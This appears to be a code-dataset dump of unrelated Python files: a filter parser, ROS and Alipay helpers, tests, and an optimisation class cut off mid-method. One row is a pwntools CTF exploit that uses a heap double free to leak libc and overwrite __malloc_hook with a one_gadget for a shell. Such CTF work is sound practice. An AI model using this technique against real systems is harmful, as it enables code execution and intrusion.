text stringlengths 38 1.54M |
|---|
from nullroute.core import Core
import uuid
from .entry_util import *
from .string import *
class FilterSyntaxError(Exception):
pass
class Filter():
def __call__(self, entry):
return bool(self.test(entry))
@staticmethod
def parse(text):
token = ""
tokens = []
depth = 0
start = -1
esc = False
Core.trace("parse input: %r", text)
for pos, char in enumerate(text):
if Core._log_level >= Core.LOG_TRACE:
Core.trace(" [%s] char=%r, pos=%d, start=%r, token=%r",
colour_repr(text, start, pos), char, pos, start, token)
if char == "(" and not esc:
if depth == 0:
if start >= 0:
# don't lose the initial "foo" in "foo(bar"
Core.trace(" tokens += prefix-word %r", token)
tokens.append(token)
start = pos + 1
token = ""
else:
token += char
Core.trace(" found opening paren; incr depth=%r", depth)
depth += 1
elif char == ")" and not esc:
Core.trace(" found closing paren; decr depth=%r", depth)
depth -= 1
if depth == 0 and start >= 0:
Core.trace(" tokens += grouped %r", token)
tokens.append(token)
start = -1
token = ""
else:
token += char
elif char in " \t\r\n" and not esc:
if depth == 0 and start >= 0:
Core.trace(" tokens += word %r", token)
tokens.append(token)
start = -1
token = ""
Core.trace(" found whitespace at d>0; unset start")
else:
token += char
elif char == "\\" and not esc:
esc = True
else:
if start < 0:
start = pos
token = ""
Core.trace(" found normal char; set start=%r", pos)
token += char
esc = False
if depth > 0:
raise FilterSyntaxError("unclosed '(' (depth %d)" % depth)
elif depth < 0:
raise FilterSyntaxError("too many ')'s (depth %d)" % depth)
else:
if start >= 0 and start <= pos:
Core.trace(" tokens += final %r", token)
tokens.append(token)
Core.trace("parse output: %r", tokens)
return tokens
@staticmethod
def quote(token):
if "(" in token or ")" in token:
return "(%s)" % token.replace("(", "\\(").replace(")", "\\)")
elif " " in token:
return "(%s)" % token
elif token:
return token
else:
return "()"
@staticmethod
def compile(db, pattern):
Core.debug("Filter: compiling %r", pattern)
tokens = Filter.parse(pattern)
if not tokens:
return ConstantFilter(False)
op, *args = tokens
Core.trace(" parsed to op=%r args=%r", op, args)
if len(args) > 0:
# boolean operators
if op in {"AND", "and", "&"}:
filters = [Filter.compile(db, x) for x in args]
return ConjunctionFilter(*filters)
elif op in {"OR", "or", "|"}:
filters = [Filter.compile(db, x) for x in args]
return DisjunctionFilter(*filters)
elif op in {"NOT", "not", "!"}:
if len(args) > 1:
raise FilterSyntaxError("too many arguments for %r" % op)
filter = Filter.compile(db, args[0])
return NegationFilter(filter)
# search filters
elif op in {"ATTR", "attr"}:
if len(args) > 3:
raise FilterSyntaxError("too many arguments for %r" % op)
return AttributeFilter(*args)
elif op in {"ITEM", "item"}:
if len(args) > 1:
raise FilterSyntaxError("too many arguments for %r" % op)
return ItemNumberFilter(*args)
elif op in {"ITEMRANGE", "itemrange"}:
if len(args) > 1:
raise FilterSyntaxError("too many arguments for %r" % op)
return ItemNumberRangeFilter(*args)
elif op in {"NAME", "name"}:
if len(args) > 2:
raise FilterSyntaxError("too many arguments for %r" % op)
return ItemNameFilter(*args)
elif op in {"PATTERN", "pattern"}:
return PatternFilter(db, " ".join(args))
elif op in {"TAG", "tag"}:
if len(args) > 2:
raise FilterSyntaxError("too many arguments for %r" % op)
return TagFilter(*args)
elif op in {"UUID", "uuid"}:
if len(args) > 1:
raise FilterSyntaxError("too many arguments for %r" % op)
return ItemUuidFilter(*args)
# etc.
elif op in {"ANY", "any"}:
if len(args) == 1:
mode = ":glob" if is_glob(args[0]) else ":exact"
return AnyFilter(mode, *args)
elif len(args) == 2:
return AnyFilter(*args)
elif len(args) >= 3:
raise FilterSyntaxError("too many arguments for %r" % op)
else:
raise FilterSyntaxError("not enough arguments for %r" % op)
elif op in {"TRUE", "true", "FALSE", "false"}:
raise FilterSyntaxError("too many arguments for %r" % op)
elif op.startswith("="):
Core.debug("unknown operator %r in (%s), trying name match", op, pattern)
return ItemNameFilter(":exact", pattern[1:])
elif "=" in op or "~" in op:
Core.debug("unknown operator %r in (%s), trying attribute match", op, pattern)
return AttributeFilter.compile(db, pattern[1:])
else:
Core.debug("unknown operator %r in (%s), assuming AND", op, pattern)
filters = [Filter.compile(db, x) for x in tokens]
return ConjunctionFilter(*filters)
# constant filters
elif op in {"TRUE", "true", "FALSE", "false"}:
return ConstantFilter(op[0] in "Tt")
# shortcut syntaxes
elif " " in op or "(" in op or ")" in op:
Core.debug("whitespace in operator %r in (%s), recursing", op, pattern)
return Filter.compile(db, op)
elif op.startswith("!"):
Core.debug("operator with '!' prefix, recursing as (NOT %s)", op[1:])
return NegationFilter(Filter.compile(db, op[1:]))
# maybe these *should* be part of PatternFilter
elif op.startswith("#"):
return ItemNumberFilter(op[1:])
elif op.startswith("{"):
return ItemUuidFilter(op)
elif op.startswith("="):
return ItemNameFilter(":exact", op[1:])
elif op.startswith("^"):
return ItemNameFilter(":regex", op)
elif op.startswith("@"):
return AttributeFilter.compile(db, op[1:])
elif op.startswith("+"):
return TagFilter(op[1:] or "*")
elif op.startswith("?"):
return AnyFilter(":regex", op[1:])
elif op.isdecimal():
return ItemNumberFilter(op)
elif re.match(r"^[0-9,-]+$", op):
return ItemNumberRangeFilter(op)
elif "=" in op[1:] or "~" in op[1:]:
return AttributeFilter.compile(db, op)
else:
Core.debug("no known prefix, trying PatternFilter(%r)", op)
return PatternFilter(db, op)
@staticmethod
def cli_search_str(db, text):
return Filter.cli_search_argv(db, [text])
@staticmethod
def cli_compile_argv(db, argv):
try:
if len(argv) > 1:
filters = [Filter.compile(db, x) for x in argv]
filter = ConjunctionFilter(*filters)
elif len(argv) > 0:
filter = Filter.compile(db, argv[0])
else:
filter = Filter.compile(db, "*")
except FilterSyntaxError as e:
Core.die("syntax error in filter: %s", e.args)
except re.error as e:
Core.die("syntax error in regex: %s", e.args)
return filter
@staticmethod
def cli_search_argv(db, argv, fmt=None):
filter = Filter.cli_compile_argv(db, argv)
if fmt:
Core.debug("applying extra filter: %r", fmt)
filter = Filter.compile(db, fmt % filter)
return db.find(filter)
@staticmethod
def cli_findfirst_argv(db, argv, fmt=None):
items = list(Filter.cli_search_argv(db, argv, fmt))
if not items:
Core.die("no entries found")
elif len(items) > 1:
Core.notice("using first result out of %d", len(items))
return items[0]
def AnyFilter(*args):
"""
String match that encompasses every visible field (item names, attribute
names, attribute values, and tags).
"""
return DisjunctionFilter(ItemNameFilter(*args),
AttributeFilter(*args),
AttributeFilter("*", *args),
TagFilter(*args))
class PatternFilter(Filter):
"""
Collection of various ad-hoc filters, most of which merely expand to other
filters (and should probably be recognized in the parent Filter.compile
instead), but a few are specific lambdas that have no other representation
besides the "(PATTERN :foo)".
Anything not otherwise recognized is assumed to be a 'PATTERN'.
"""
def __init__(self, db, pattern):
self.pattern = pattern
self.func = PatternFilter.compile(db, self.pattern)
def test(self, entry):
return self.func(entry)
def __str__(self):
if isinstance(self.func, Filter):
return str(self.func)
else:
return "(PATTERN %s)" % Filter.quote(self.pattern)
@staticmethod
def compile(db, arg):
Core.debug("PatternFilter: compiling %r", arg)
if arg == "*":
return ConstantFilter(True)
elif arg.startswith("@"):
return AttributeFilter.compile(db, arg[1:])
elif arg.startswith("~"):
try:
return ItemNameFilter(":regex", arg[1:])
except re.error as e:
Core.die("invalid regex %r (%s)", arg[1:], e)
elif arg.startswith("="):
return ItemNameFilter(":exact", arg[1:])
elif arg.startswith(":"):
if arg == ":active":
return Filter.compile(db, "NOT :inactive")
elif arg == ":inactive":
return Filter.compile(db, "OR +cancelled +dead +expired +gone")
elif arg == ":dead":
return Filter.compile(db, "AND (NOT +dead) @date.shutdown<now+3")
elif arg == ":dying":
return Filter.compile(db, "AND (NOT +dead) @date.shutdown")
elif arg == ":expired":
return Filter.compile(db, "OR"
" (AND (NOT +expired) @date.expiry<now+30)"
" (AND (NOT +dead) @date.shutdown<now+3)")
elif arg == ":expiring":
return Filter.compile(db, "AND (NOT +expired) @date.expiry<now+30")
elif arg == ":untagged":
return Filter.compile(db, "NOT (TAG *)")
elif arg == ":weak":
return Filter.compile(db, "AND :active !+smartcard !+default !+other"
" @!pass~^.{,9}$")
elif arg == ":badref":
return lambda entry: entry.has_bad_references()
else:
Core.die("unrecognized pattern %r", arg)
elif arg.startswith("{"):
return ItemUuidFilter(arg)
else:
return ItemNameFilter(":glob", arg)
class ItemNameFilter(Filter):
def __init__(self, *args):
if len(args) == 1:
mode = ":glob"
value, = args
elif len(args) == 2:
mode, value = args
elif len(args) >= 3:
raise FilterSyntaxError("too many arguments for %r" % "NAME")
else:
raise FilterSyntaxError("not enough arguments for %r" % "NAME")
self.mode = mode
self.value = value
if mode in {":exact", "="}:
self.mode = ":exact"
value = value.casefold()
self.test = lambda entry: any(v.casefold() == value for v in entry.names)
Core.trace("compiled to [name = %r]", value)
elif mode in {":glob", "?"}:
self.mode = ":glob"
regex = re_compile_glob(value)
self.test = lambda entry: any(regex.fullmatch(str(v)) for v in entry.names)
Core.trace("compiled to [name ~ %r]", regex)
elif mode in {":regex", "~"}:
self.mode = ":regex"
regex = re.compile(value, re.I)
self.test = lambda entry: any(regex.search(str(v)) for v in entry.names)
Core.trace("compiled to [name ~ %r]", regex)
else:
raise FilterSyntaxError("unknown mode %r for %r" % (mode, "NAME"))
def __str__(self):
return "(NAME %s %s)" % (self.mode, Filter.quote(self.value))
class AttributeFilter(Filter):
def __init__(self, *args):
if len(args) == 1:
mode = ":exact"
attr, = args
value = None
elif len(args) == 2:
mode, attr = args
value = None
elif len(args) == 3:
attr, mode, value = args
elif len(args) >= 4:
raise FilterSyntaxError("too many arguments for %r" % "ATTR")
else:
raise FilterSyntaxError("not enough arguments for %r" % "ATTR")
self.attr = attr
self.mode = mode
self.value = value
if value is None:
if mode in {":exact", "="}:
self.mode = ":exact"
self.test = lambda entry: attr in entry.attributes
Core.trace("compiled to [key %r present]", attr)
elif mode in {":glob", "?"}:
self.mode = ":glob"
regex = re_compile_glob(attr)
self.test = lambda entry: any(regex.fullmatch(k) for k in entry.attributes)
Core.trace("compiled to [keys ~ %r]", regex)
elif mode in {":regex", "~"}:
self.mode = ":regex"
regex = re.compile(attr, re.I)
self.test = lambda entry: any(regex.search(k) for k in entry.attributes)
Core.trace("compiled to [keys ~ %r]", regex)
else:
raise FilterSyntaxError("unknown attr-mode %r for %r" % (mode, "ATTR"))
elif value == "":
raise FilterSyntaxError("empty match value after %r" % attr)
elif attr == "*":
if mode in {":exact", "="}:
self.mode = ":exact"
self.test = lambda entry: any(value in vs
for vs in entry.attributes.values())
Core.trace("compiled to [values = %r]", value)
elif mode in {":glob", "?"}:
self.mode = ":glob"
regex = re_compile_glob(value)
self.test = lambda entry: any(any(regex.fullmatch(str(v)) for v in vs)
for vs in entry.attributes.values())
Core.trace("compiled to [values ~ %r]", regex)
elif mode in {":regex", "~"}:
self.mode = ":regex"
regex = re.compile(value, re.I)
self.test = lambda entry: any(any(regex.search(str(v)) for v in vs)
for vs in entry.attributes.values())
Core.trace("compiled to [values ~ %r]", regex)
else:
raise FilterSyntaxError("unknown value-mode %r for %r" % (mode, "ATTR"))
else:
if mode in {":exact", "="}:
self.mode = ":exact"
self.test = lambda entry: value in entry.attributes.get(attr, [])
Core.trace("compiled to [%r = %r]", attr, value)
elif mode in {":glob", "?"}:
self.mode = ":glob"
regex = re_compile_glob(value)
self.test = lambda entry: any(regex.fullmatch(str(v))
for v in entry.attributes.get(attr, []))
Core.trace("compiled to [%r ~ %r]", attr, regex)
elif mode in {":regex", "~"}:
self.mode = ":regex"
regex = re.compile(value, re.I)
self.test = lambda entry: any(regex.search(str(v))
for v in entry.attributes.get(attr, []))
Core.trace("compiled to [%r ~ %r]", attr, regex)
elif mode in {":lt", "<"}:
self.mode = "<"
if attr.startswith("date."):
self.test = lambda entry: any(date_cmp(v, value) < 0
for v in entry.attributes.get(attr, []))
Core.trace("compiled to [%r < %r]", attr, value)
else:
raise FilterSyntaxError("unsupported op %r %r " % (attr, mode))
elif mode in {":gt", ">"}:
self.mode = ">"
if attr.startswith("date."):
self.test = lambda entry: any(date_cmp(v, value) > 0
for v in entry.attributes.get(attr, []))
Core.trace("compiled to [%r > %r]", attr, value)
else:
raise FilterSyntaxError("unsupported op %r %r " % (attr, mode))
else:
raise FilterSyntaxError("unknown value-mode %r for %r" % (mode, "ATTR"))
def __str__(self):
if self.value is None:
return "(ATTR %s %s)" % (self.mode, Filter.quote(self.attr))
else:
return "(ATTR %s %s %s)" % (Filter.quote(self.attr), self.mode,
Filter.quote(self.value))
@staticmethod
def compile(db, arg):
Core.debug("AttributeFilter: compiling %r", arg)
if "=" in arg:
attr, glob = arg.split("=", 1)
attr = translate_attr(attr)
if attr_is_reflink(attr) and glob.startswith("#"):
try:
value = db.expand_attr_cb(attr, glob)
Core.trace("-- expanded match value %r to %r", glob, value)
return AttributeFilter(attr, ":exact", value)
except IndexError:
Core.trace("-- failed to expand match value %r", glob)
return ConstantFilter(False)
elif is_glob(glob):
return AttributeFilter(attr, ":glob", glob)
else:
return AttributeFilter(attr, ":exact", glob)
elif "~" in arg:
attr, regex = arg.split("~", 1)
attr = translate_attr(attr)
try:
return AttributeFilter(attr, ":regex", regex)
except re.error as e:
Core.die("invalid regex %r (%s)", regex, e)
elif "<" in arg:
attr, match = arg.split("<", 1)
return AttributeFilter(attr, "<", match)
elif ">" in arg:
attr, match = arg.split(">", 1)
return AttributeFilter(attr, ">", match)
elif "*" in arg:
return AttributeFilter(":glob", arg)
else:
attr = translate_attr(arg)
return AttributeFilter(":exact", attr)
class TagFilter(Filter):
def __init__(self, *args):
if len(args) == 1:
mode = None
value, = args
elif len(args) == 2:
mode, value = args
elif len(args) >= 3:
raise FilterSyntaxError("too many arguments for %r" % "TAG")
else:
raise FilterSyntaxError("not enough arguments for %r" % "TAG")
self.mode = mode
self.value = value
if mode is None:
if value == "":
self.mode = ":exact"
self.test = lambda entry: len(entry.tags) == 0
elif value == "*":
self.mode = ":glob"
self.test = lambda entry: len(entry.tags) > 0
elif is_glob(value):
self.mode = ":glob"
regex = re_compile_glob(self.value)
self.test = lambda entry: any(regex.fullmatch(t) for t in entry.tags)
else:
self.mode = ":exact"
self.test = lambda entry: value in entry.tags
else:
if mode in {":exact", "="}:
self.mode = ":exact"
self.test = lambda entry: value in entry.tags
elif mode in {":glob", "?"}:
self.mode = ":glob"
regex = re_compile_glob(value)
self.test = lambda entry: any(regex.fullmatch(t) for t in entry.tags)
elif mode in {":regex", "~"}:
self.mode = ":regex"
regex = re.compile(value, re.I)
self.test = lambda entry: any(regex.search(str(t)) for t in entry.tags)
else:
raise FilterSyntaxError("unknown mode %r for %r" % (mode, "TAG"))
def __str__(self):
if self.mode == ":exact":
return "(TAG %s)" % Filter.quote(self.value)
else:
return "(TAG %s %s)" % (self.mode, Filter.quote(self.value))
class ItemNumberFilter(Filter):
def __init__(self, pattern):
try:
self.value = int(pattern)
except ValueError:
raise FilterSyntaxError("integer value expected for 'ITEM'")
def test(self, entry):
return entry.itemno == self.value
def __str__(self):
return "(ITEM %d)" % self.value
class ItemNumberRangeFilter(Filter):
def __init__(self, pattern):
self.pattern = pattern
self.items = set(expand_range(pattern))
def test(self, entry):
return entry.itemno in self.items
def __str__(self):
return "(ITEMRANGE %s)" % self.pattern
class ItemUuidFilter(Filter):
def __init__(self, pattern):
try:
self.value = uuid.UUID(pattern)
except ValueError:
raise FilterSyntaxError("malformed value for %r" % "UUID")
def test(self, entry):
return entry.uuid == self.value
def __str__(self):
return "(UUID %s)" % self.value
class ConjunctionFilter(Filter):
def __init__(self, *filters):
self.filters = list(filters)
def test(self, entry):
return all(filter.test(entry) for filter in self.filters)
def __str__(self):
return "(AND %s)" % " ".join(str(f) for f in self.filters)
class DisjunctionFilter(Filter):
def __init__(self, *filters):
self.filters = list(filters)
def test(self, entry):
return any(filter.test(entry) for filter in self.filters)
def __str__(self):
return "(OR %s)" % " ".join(str(f) for f in self.filters)
class NegationFilter(Filter):
def __init__(self, filter):
self.filter = filter
def test(self, entry):
return not self.filter.test(entry)
def __str__(self):
return "(NOT %s)" % self.filter
class ConstantFilter(Filter):
def __init__(self, result):
self.result = bool(result)
def test(self, entry):
return self.result
def __str__(self):
return "(TRUE)" if self.result else "(FALSE)"
|
from typing import Optional, Dict
import xml.etree.ElementTree as ET
class EphemeralLaunchFile(object):
"""
Provides temporary launch files that can be used to pass launch-time
parameters to ROS. Specifically, ephemeral launch files are used to provide
launch-time parameters to ROSLaunchParent since there is no means to supply
parameters via the ROSLaunchParent API.
"""
def __init__(self,
base_file: str,
parameters: Optional[Dict[str, str]] = None
) -> None:
if parameters is None:
parameters = {}
tree = ET.ElementTree()
tree.parse(base_file)
root = tree.getroot()
# find the corresponding argument for each parameter
new_parameters = []
for (param, value) in parameters.items():
found = False
# doesn't look at child arguments --- considered unnecessary
for arg in root.find("arg[@name='{}']".format(param)):
arg.attrib.pop('default')
arg.set('value', value)
found = True
# if we didn't find the tag for this argument, add a new one
if not found:
arg = ET.SubElement(root, 'arg')
arg.set('name', param)
arg.set('value', value)
# n.b. Python will take care of destroying the temporary file during
# garbage collection
self.__handle = open('temp.launch', 'w') # FIXME: this is here for debugging
# self.handle = NamedTemporaryFile(suffix='.launch')
tree.write(self.path)
@property
def path(self):
"""
The location of this launch file on disk.
"""
return self.__handle.name
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayCommerceEducateFacepayApplyModel(object):
def __init__(self):
self._ext_info = None
self._face_open_id = None
self._face_uid = None
self._scene = None
self._school_stdcode = None
@property
def ext_info(self):
return self._ext_info
@ext_info.setter
def ext_info(self, value):
self._ext_info = value
@property
def face_open_id(self):
return self._face_open_id
@face_open_id.setter
def face_open_id(self, value):
self._face_open_id = value
@property
def face_uid(self):
return self._face_uid
@face_uid.setter
def face_uid(self, value):
self._face_uid = value
@property
def scene(self):
return self._scene
@scene.setter
def scene(self, value):
self._scene = value
@property
def school_stdcode(self):
return self._school_stdcode
@school_stdcode.setter
def school_stdcode(self, value):
self._school_stdcode = value
def to_alipay_dict(self):
params = dict()
if self.ext_info:
if hasattr(self.ext_info, 'to_alipay_dict'):
params['ext_info'] = self.ext_info.to_alipay_dict()
else:
params['ext_info'] = self.ext_info
if self.face_open_id:
if hasattr(self.face_open_id, 'to_alipay_dict'):
params['face_open_id'] = self.face_open_id.to_alipay_dict()
else:
params['face_open_id'] = self.face_open_id
if self.face_uid:
if hasattr(self.face_uid, 'to_alipay_dict'):
params['face_uid'] = self.face_uid.to_alipay_dict()
else:
params['face_uid'] = self.face_uid
if self.scene:
if hasattr(self.scene, 'to_alipay_dict'):
params['scene'] = self.scene.to_alipay_dict()
else:
params['scene'] = self.scene
if self.school_stdcode:
if hasattr(self.school_stdcode, 'to_alipay_dict'):
params['school_stdcode'] = self.school_stdcode.to_alipay_dict()
else:
params['school_stdcode'] = self.school_stdcode
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayCommerceEducateFacepayApplyModel()
if 'ext_info' in d:
o.ext_info = d['ext_info']
if 'face_open_id' in d:
o.face_open_id = d['face_open_id']
if 'face_uid' in d:
o.face_uid = d['face_uid']
if 'scene' in d:
o.scene = d['scene']
if 'school_stdcode' in d:
o.school_stdcode = d['school_stdcode']
return o
|
from pwn import *
context.arch = 'amd64'
###Utils
def new(sz,data):
r.sendlineafter('> ','1')
r.sendlineafter('size: ',str(sz))
r.sendafter('content: ',data)
def prnt(idx):
r.sendlineafter('> ','2')
r.sendlineafter('index: ',str(idx))
return r.recvline()[:-1]
def rmv(idx):
r.sendlineafter('> ','3')
r.sendlineafter('index: ',str(idx))
r = remote('csie.ctf.tw',10133)
###Useful Address
stdout_offset = 0x3c4620 #strange, why this one?
one_gadget = 0xef6c4 #rsp+0x50 will always be 0 in doublefree handler :)
leak_stdout = 0x601ff5
malloc_hook_block_offset = 0x3c3b10-0x28+0x5
###Leak libc_base
new(0x68,'a')
new(0x68,'b')
rmv(0)
rmv(1)
rmv(0)
new(0x68,p64(leak_stdout))
new(0x68,'d')
new(0x68,'e')
new(0x68,'f'*27)
stdout_addr = u64(prnt(5)[27:].ljust(8,b'\x00'))
libc_base = stdout_addr-stdout_offset
###Hijack malloc_hook
rmv(0)
rmv(1)
rmv(0)
new(0x68,flat(malloc_hook_block_offset+libc_base))
new(0x68,'d')
new(0x68,'e')
new(0x68,b'f'*3+p64(0)*2+p64(one_gadget+libc_base))
###Double free #double free mallocs a block to write error message
rmv(0)
rmv(0)
r.interactive()
|
print('HELLO\nWELCOME TO OUR SOFTWARE')
username = (input('ENTER YOUR USERNAME: '))
#password = int(input('ENTER YOUR PASSWORD: '))
access='DIVINE'
try:
if username== access :
password = int(input('ENTER YOUR PASSWORD: '))
if password == 1234 :
print('YOU ARE WELCOME', username)
else:
print('invalid Username')
except Exception as e:
print(e)
|
from __future__ import unicode_literals
from django.apps import AppConfig
class AnappConfig(AppConfig):
name = 'anapp'
|
import unittest
from bs4 import BeautifulSoup
from nanorcc.parse import parse_tag, parse_rcc_file, get_rcc_data
from collections import OrderedDict
import pandas as pd
class TestParseTag(unittest.TestCase):
"""test the parse_tag function using example.RCC"""
def setUp(self):
with open('test/example.RCC','r') as f:
soup = BeautifulSoup(f.read(),'html.parser')
self.header_tag = soup.contents[0]
self.sample_attributes_tag = soup.contents[2]
self.lane_attributes_tag = soup.contents[4]
self.code_summary_tag = soup.contents[6]
self.messages_tag = soup.contents[8]
def test_header(self):
name,result = parse_tag(self.header_tag)
self.assertDictEqual(
result,
{'FileVersion':'1.6','SoftwareVersion':'2.1.1.0005'}
)
self.assertEqual(name,'Header'.casefold())
def test_sample_attributes(self):
name,result = parse_tag(self.sample_attributes_tag)
self.assertDictEqual(
result,
{
'SampleID':'01',
'Owner':'mk',
'Comments':'50ng',
'Date':'20100714',
'GeneRLF':'NS_H_miR',
'SystemAPF':'n6_vDV1',
}
)
self.assertEqual(name,'Sample_Attributes'.casefold())
def test_lane_attributes(self):
name,result = parse_tag(self.lane_attributes_tag)
self.assertDictEqual(
result,
{
'LaneID':'1',
'FovCount':'600',
'FovCounted':'600',
'ScannerID':'DA01',
'StagePosition':'1',
'BindingDensity':'0.22',
'CartridgeID':'miRNAlinearity',
}
)
self.assertEqual(name,'Lane_Attributes'.casefold())
def test_code_summary(self):
name,result = parse_tag(self.code_summary_tag)
self.assertCountEqual(
result,
[
{
'CodeClass':'Positive',
'Name':'POS_A(128)',
'Accession':'nmiR00813.1',
'Count':'8667',
},
{
'CodeClass':'Negative',
'Name':'NEG_C(0)',
'Accession':'nmiR00828.1',
'Count':'11',
},
{
'CodeClass':'Housekeeping',
'Name':'RPLP0|0',
'Accession':'NM_001002.3',
'Count':'137',
},
{
'CodeClass':'Endogenous1',
'Name':'hsa-miR-758|0',
'Accession':'nmiR00633.1',
'Count':'12',
},
]
)
self.assertEqual(name,'Code_Summary'.casefold())
def test_messages(self):
name,result = parse_tag(self.messages_tag)
self.assertEqual(name,'Messages'.casefold())
self.assertEqual(result,'')
class TestParseRCCFile(unittest.TestCase):
"""test parse_rcc_file function"""
def setUp(self):
self.example = 'test/example.RCC'
self.sample_data,self.genes = parse_rcc_file(self.example)
def test_sample_data(self):
self.assertIsInstance(self.sample_data,OrderedDict)
self.assertEqual(self.sample_data['hsa-miR-758|0'],12.0)
self.assertEqual(self.sample_data['NEG_C(0)'],11.0)
self.assertEqual(len(self.sample_data),20)
def test_genes(self):
self.assertIsInstance(self.genes,list)
[self.assertIsInstance(i,OrderedDict) for i in self.genes]
self.assertEqual(len(self.genes),4)
self.assertIn('CodeClass',self.genes[0].keys())
self.assertIn('Accession',self.genes[0].keys())
self.assertIn('Name',self.genes[0].keys())
def test_full_file(self):
data,genes = parse_rcc_file('test/full_file_test.RCC')
self.assertEqual(len(genes),753)
self.assertEqual(len(data),769)
class TestGetRccData(unittest.TestCase):
"""test get_rcc_data function"""
def setUp(self):
self.file_path = r'test\example_data_RCC\*RCC'
self.data,self.genes = get_rcc_data(self.file_path)
def test_input_type_raise(self):
self.assertRaises(TypeError,get_rcc_data,12)
def test_warning(self):
self.assertWarns(UserWarning,get_rcc_data,self.file_path)
def test_is_dataframe(self):
self.assertIsInstance(self.data,pd.core.frame.DataFrame)
self.assertIsInstance(self.genes,pd.core.frame.DataFrame)
def test_output_size(self):
self.assertTupleEqual(self.data.shape,(12,769))
self.assertTupleEqual(self.genes.shape,(753,3))
if __name__ == "__main__":
unittest.main() |
import time
import numpy as np
from algorithms.memetic.memetic_algorithm import MemeticAlgorithm
from algorithms.genetic.nsga_ii import NSGAII
from problems.problem import Problem
class NSMA(NSGAII, MemeticAlgorithm):
"""
Class for the NSMA Algorithm
The main functions are:
- Initialize a NSMA instance;
- Execute the Algorithm starting from a set of initial points of the problem at hand;
- Compute the surrogate bounds based on the current population.
Notes: Like NSGA-II, NSMA does not require any selection operator.
"""
def __init__(self,
max_iter: int,
max_time: float,
max_f_evals: int,
verbose: bool,
verbose_interspace: int,
plot_pareto_front: bool,
plot_pareto_solutions: bool,
plot_dpi: int,
pop_size: int,
crossover_probability: float,
crossover_eta: float,
mutation_eta: float,
shift: float,
crowding_quantile: float,
n_opt: int,
FMOPG_max_iter: int,
theta_for_stationarity: float,
theta_tol: float,
theta_dec_factor: float,
gurobi: bool,
gurobi_method: int,
gurobi_verbose: bool,
ALS_alpha_0: float,
ALS_delta: float,
ALS_beta: float,
ALS_min_alpha: float):
"""
Initialize a NSMA instance
:param max_iter: maximum number of iterations
:param max_time: maximum number of elapsed minutes on a problem
:param max_f_evals: maximum number of function evaluations
:param verbose: if set to True, then the VerboseSystem instance is used during the Algorithm iterations
:param verbose_interspace: space between a metric and another one in the printing of the VerboseSystem instance
:param plot_pareto_front: if set to True, the Pareto front is plotted at each Algorithm iteration (see GraphicalPlot.py)
:param plot_pareto_solutions: if set to True and whenever is possible, the Pareto solutions are plotted at each Algorithm iteration
:param plot_dpi: it indicates the dpi of the image(s) containing the plot(s)
:param pop_size: size of the population
:param crossover_probability: see nsga_ii.py
:param crossover_eta: see nsga_ii.py
:param mutation_eta: see nsga_ii.py
:param shift: shift value used to calculate the surrogate bounds
:param crowding_quantile: requested quantile of the finite crowding distances related to the rank-0 feasible points
:param n_opt: every n_opt iterations, the FMOPG Algorithm is called on some points (see the function search (np.array, np.array, Problem))
:param FMOPG_max_iter: maximum number of iterations for the FMOPG Algorithm
:param theta_for_stationarity: it indicates the tolerance after which a point is considered Pareto-stationary for the NSMA Algorithm; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article
:param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary for the FMOPG Algorithm; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article
:param theta_dec_factor: it indicates the coefficient for the theta_tol value contraction
:param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem
:param gurobi_method: it indicates the method used by the Gurobi Optimizer
:param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer
:param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search
:param ALS_delta: it indicates the coefficient for the step size contraction
:param ALS_beta: it indicates the coefficient for the sufficient decrease condition
:param ALS_min_alpha: it indicates the minimum value of alpha that is considered by the Armijo-Type Line Search; after that, the line search fails returning a null step size
Notes: theta_tol must be smaller than theta_for_stationarity (both are negative numbers).
In order to use the Gurobi Optimizer, you need it installed in your computer and, in addition, you need a Gurobi Licence.
For more details on Gurobi, the user is referred to the Gurobi website (https://www.gurobi.com/).
"""
NSGAII.__init__(self,
max_iter,
max_time,
max_f_evals,
verbose,
verbose_interspace,
plot_pareto_front,
plot_pareto_solutions,
plot_dpi,
pop_size,
crossover_probability,
crossover_eta,
mutation_eta)
MemeticAlgorithm.__init__(self,
max_iter, max_time, max_f_evals, verbose, verbose_interspace, plot_pareto_front, plot_pareto_solutions, plot_dpi,
pop_size,
theta_tol,
gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha,
crowding_quantile, n_opt, theta_for_stationarity, theta_dec_factor,
'FMOPG',
{'theta_tol': theta_tol, 'gurobi': gurobi, 'gurobi_method': gurobi_method, 'gurobi_verbose': gurobi_verbose, 'ALS_alpha_0': ALS_alpha_0, 'ALS_delta': ALS_delta, 'ALS_beta': ALS_beta, 'ALS_min_alpha': ALS_min_alpha, 'FMOPG_max_iter': FMOPG_max_iter, 'max_time': max_time, 'max_f_evals': max_f_evals})
self.__shift = shift
def search(self, p_list: np.array, f_list: np.array, problem: Problem):
"""
Execution of the Algorithm, given some initial points of the problem at hand
:param p_list: initial problem solutions
:param f_list: related points in the objectives space
:param problem: the considered problem
:return: the new solutions (p_list, f_list) and the elapsed time
"""
self.update_stopping_condition_current_value('max_time', time.time())
m = f_list.shape[1]
# Return a list of every possible subset of objective functions indices. #
objectives_powerset = self.objectives_powerset(m)
# Computation of the rank, crowding distance and constraint violation for each problem solution. #
# Every initial point is considered not epsilon-Pareto-stationary. #
constraint_violations = np.array([[sum([constraint if constraint > 0 else 0 for constraint in problem.evaluate_constraints(p)])] for p in p_list])
eps_pareto_stationarity = np.array([[False] * len(objectives_powerset)] * p_list.shape[0])
p_list, f_list, constraint_violations, rank_list, crowding_list, eps_pareto_stationarity, _ = self._survival_strategy.get_survivals(p_list, f_list, constraint_violations, eps_pareto_stationarity)
self.show_figure(p_list, f_list)
threshold_crowding_distance = None
while not self.evaluate_stopping_conditions():
# VerboseSystem: the metrics specific for NSMA are the maximum finite rank, the maximum rank (including the infinity values) and the minimum crowding distance. #
self.output_data(f_list, max_finite_rank=max(rank_list[np.isfinite(rank_list)]), max_rank=max(rank_list.flatten()), min_crowding_dist=min(crowding_list.flatten()))
# Computation of the surrogate bounds to find the offsprings. #
